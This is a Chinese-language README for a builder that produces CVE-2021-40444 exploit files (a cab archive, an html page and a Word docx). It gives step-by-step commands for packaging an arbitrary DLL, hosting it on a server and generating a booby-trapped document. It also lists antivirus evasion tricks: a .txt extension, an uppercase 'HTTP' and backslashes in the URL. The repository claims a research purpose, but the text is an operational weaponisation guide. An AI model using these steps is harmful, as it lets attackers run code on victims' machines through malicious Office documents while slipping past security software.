CVE-2021-40444 构建器
该仓库包含用于CVE-2021-40444漏洞利用的cab文件、html文件和docx文件的构建器。本仓库仅用于测试、研究和教育目的。您需自行承担使用本仓库提供的代码所产生的责任。
该代码是通过逆向工程师在野外发现的恶意软件样本而开发的,这些样本由多位安全研究人员分享。
该CVE的构建器已经公开。本仓库旨在检验在编写本文时,我们能否有效绕过不同反病毒厂商对docx文件的静态检测。
JS代码可以通过在线工具或手动轻松混淆。但docx文件仅包含一个文件——document.xml.rels,签名可以基于该文件。我们可以篡改其中的哪些内容,从而规避大多数反病毒软件的静态检测。
cabrc.exe是包含在Internet Explorer管理工具包中的Microsoft可执行文件,可从 https://docs.microsoft.com/en-us/internet-explorer/ie11-ieak/ieak-information-and-downloads 下载,安装后你会在“C:\Program Files (x86)\Windows IEAK 11”中找到这个exe文件。
共有3个构建器。
该代码适用于python 2.7。
首先进入CVE-2021-40444文件夹,将你的dll文件放入其中并将其重命名为IEcache.inf(或者你可以使用已放在那里的calc dll)。
然后进入source文件夹生成cab文件
c:\cve-2021-40444\sources\python generate_cab.py
上传你的cab文件,并使用cab文件的URL生成html文件
c:\cve-2021-40444\sources\python generate_html.py http://192.168.1.12/new/winupdate.cab tests.txt (注意,如果使用.txt而不是.html扩展名,漏洞仍然有效,但可以绕过反病毒软件)
现在最后上传你的html文件并生成doc文件。使用HTTP(大写)而不是http,并使用“\”而不是“/”,以绕过反病毒软件。同时我们不需要x-usc:。
示例:c:\cve-2021-40444\sources\python generate_doc.py HTTP:\\192.168.1.12\new\tests.txt
结果就在你面前。


www.aslitsecurity.com
[email protected]